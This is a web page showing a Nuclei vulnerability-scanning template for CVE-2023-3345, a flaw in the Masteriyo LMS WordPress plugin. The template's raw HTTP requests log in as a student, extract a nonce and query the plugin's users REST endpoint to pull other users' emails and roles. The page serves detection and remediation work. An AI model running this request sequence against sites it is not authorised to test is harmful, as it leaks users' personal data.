Skip to content
Nuclei Templates

LMS by Masteriyo < 1.6.8 - Information Exposure

ID: CVE-2023-3345

Severity: medium

Author: DhiyaneshDK

Tags: cve2023,cve,wp-plugin,wp,wordpress,exposure,authenticated,learning-management-system,wpscan,masteriyo

Description

Section titled “Description”

The plugin does not properly safeguards sensitive user information, like other user’s email addresses, making it possible for any students to leak them via some of the plugin’s REST API endpoints.

YAML Source

Section titled “YAML Source”
id: CVE-2023-3345


info:
  name: LMS by Masteriyo < 1.6.8 - Information Exposure
  author: DhiyaneshDK
  severity: medium
  description: |
    The plugin does not properly safeguards sensitive user information, like other user's email addresses, making it possible for any students to leak them via some of the plugin's REST API endpoints.
  impact: |
    An attacker can gain unauthorized access to sensitive information.
  remediation: |
    Upgrade LMS by Masteriyo to version 1.6.8 or higher to fix the vulnerability.
  reference:
    - https://wpscan.com/vulnerability/0d07423e-98d2-43a3-824d-562747a3d65a
    - https://github.com/RandomRobbieBF/learning-management-system
    - https://wordpress.org/plugins/learning-management-system
    - https://nvd.nist.gov/vuln/detail/CVE-2023-3345
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2023-3345
    cwe-id: CWE-200
    epss-score: 0.00446
    epss-percentile: 0.74935
    cpe: cpe:2.3:a:masteriyo:masteriyo:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: masteriyo
    product: masteriyo
    framework: wordpress
  tags: cve2023,cve,wp-plugin,wp,wordpress,exposure,authenticated,learning-management-system,wpscan,masteriyo


http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded


        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
      - |
        GET /wp-admin/profile.php HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /wp-json/masteriyo/v1/users/ HTTP/1.1
        Host: {{Hostname}}
        X-WP-Nonce: {{nonce}}


    matchers-condition: and
    matchers:
      - type: word
        part: body_3
        words:
          - '"username":'
          - '"email":'
          - '"roles":'
        condition: and


      - type: word
        part: header_3
        words:
          - application/json


      - type: status
        status:
          - 200


    extractors:
      - type: regex
        name: nonce
        part: body
        group: 1
        regex:
          - '"nonce":"([a-z0-9]+)","versionString'
        internal: true
# digest: 490a0046304402202bb907cbbf4cc10a7c1e2315d7fc541788d957fbc0ea064dba4044ea0c03b1b502203934ad7638d85655ed17ded3e2430eedaf4fdac5d43c9cbeeef08251da60817e:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-3345.yaml"

View on Github